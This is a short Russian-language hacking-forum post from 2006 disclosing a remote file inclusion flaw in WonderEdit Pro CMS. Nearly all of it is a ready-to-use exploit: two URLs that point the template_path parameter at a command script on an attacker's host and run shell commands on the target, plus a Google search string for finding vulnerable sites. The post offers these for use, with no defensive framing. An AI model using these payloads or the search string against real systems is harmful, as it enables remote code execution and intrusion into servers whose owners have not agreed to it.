XSS.stack #1 – первый литературный журнал от юзеров форума

Web WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities

Автор темы Ŧ1LAN
Дата начала 05.07.2006

Отслеживать

Ŧ1LAN

CPU register

Пользователь

05.07.2006

Добавить закладку
#1

WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities
Пример/эксплоит:

Код:

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls

Google dork: "powered by WonderEdit Pro"

Показать игнорируемый контент

Напишите ответ...

Прикрепить файлы

Библиотека
Багтрек

Верх